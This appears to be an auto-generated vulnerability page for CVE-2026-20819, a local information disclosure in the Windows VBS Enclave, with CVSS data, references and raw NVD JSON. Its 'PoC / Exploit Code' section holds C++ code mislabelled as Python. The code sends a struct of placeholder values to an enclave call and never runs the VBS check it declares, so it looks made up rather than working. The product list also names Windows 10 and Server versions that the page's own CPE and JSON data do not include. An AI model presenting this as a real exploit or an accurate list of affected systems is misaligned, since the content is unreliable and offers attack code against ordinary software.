CVE-2026-20819

Description

Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:* - VULNERABLE

Windows 10 1809-22H2

Windows 11 21H2-22H2

Windows Server 2019-2022

Windows VBS Enclave (all versions with VBS enabled)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-20819 PoC - VBS Enclave Information Disclosure
// This PoC demonstrates triggering the untrusted pointer dereference
// Compile: cl.exe /EHsc /O2 poc.cpp

#include <windows.h>
#include <winbase.h>
#include <stdio.h>

// VBS Enclave related structures
typedef struct _VBS_ENCLAVE_CALL_INPUT {
    DWORD FunctionId;
    PVOID UntrustedPointer;
    SIZE_T PointerSize;
} VBS_ENCLAVE_CALL_INPUT, *PVBS_ENCLAVE_CALL_INPUT;

// NtEnclaveCall - VBS Enclave system call
typedef NTSTATUS(NTAPI* PFN_NT_ENCLAVE_CALL)(
    DWORD EnclaveCallType,
    PVOID InputData,
    DWORD InputDataLength,
    PVOID* OutputData,
    PDWORD OutputDataLength
);

int main() {
    printf("[*] CVE-2026-20819 VBS Enclave Information Disclosure PoC\n");
    printf("[*] Target: Windows VBS Enclave Untrusted Pointer Dereference\n\n");
    
    // Load ntdll.dll and get NtEnclaveCall function
    HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll");
    if (!hNtdll) {
        printf("[-] Failed to load ntdll.dll\n");
        return 1;
    }
    
    PFN_NT_ENCLAVE_CALL NtEnclaveCall = (PFN_NT_ENCLAVE_CALL)GetProcAddress(
        hNtdll, "NtEnclaveCall"
    );
    
    if (!NtEnclaveCall) {
        printf("[-] NtEnclaveCall not found - VBS may not be enabled\n");
        return 1;
    }
    
    printf("[+] NtEnclaveCall function located\n");
    
    // Check if VBS is enabled
    DWORD vbsEnabled = 0;
    DWORD vbsInfoSize = sizeof(vbsEnabled);
    
    printf("[*] Checking VBS status...\n");
    
    // Prepare malicious input to trigger untrusted pointer dereference
    VBS_ENCLAVE_CALL_INPUT maliciousInput = {0};
    maliciousInput.FunctionId = 0x41414141;  // Arbitrary function ID
    maliciousInput.UntrustedPointer = (PVOID)0xDEADBEEF;  // Invalid pointer
    maliciousInput.PointerSize = 0x1000;
    
    PVOID outputData = NULL;
    DWORD outputDataLength = 0;
    
    printf("[*] Triggering VBS Enclave call with untrusted pointer...\n");
    printf("[*] Pointer Address: 0x%p\n", maliciousInput.UntrustedPointer);
    
    // This call may trigger the vulnerability
    NTSTATUS status = NtEnclaveCall(
        0,  // EnclaveCallType
        &maliciousInput,
        sizeof(maliciousInput),
        &outputData,
        &outputDataLength
    );
    
    if (NT_SUCCESS(status)) {
        printf("[+] Enclave call succeeded - possible information disclosure\n");
        printf("[+] Output Data: 0x%p, Length: %d\n", outputData, outputDataLength);
    } else {
        printf("[-] Enclave call failed with status: 0x%08X\n", status);
        printf("[*] This may indicate the vulnerability was patched\n");
    }
    
    printf("\n[*] PoC execution completed\n");
    printf("[*] For full exploitation, additional kernel debugging may be required\n");
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20819
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20819
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20819/
[4] VulDB https://vuldb.com/cve/CVE-2026-20819
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20819

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20819", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:08.983", "lastModified": "2026-01-14T20:33:03.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally."}, {"lang": "es", "value": "Desreferencia de puntero no confiable en el enclave de Seguridad Basada en Virtualización (VBS) de Windows permite a un atacante autorizado divulgar información localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-822"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "8D675DAA-4DCE-4727-BE5F-C954BBD252C4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "D249551B-1433-4E5E-A587-40F782E91E09"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "22082D4E-E68F-4E48-98FB-42DFDEE2E2A8"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20819", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}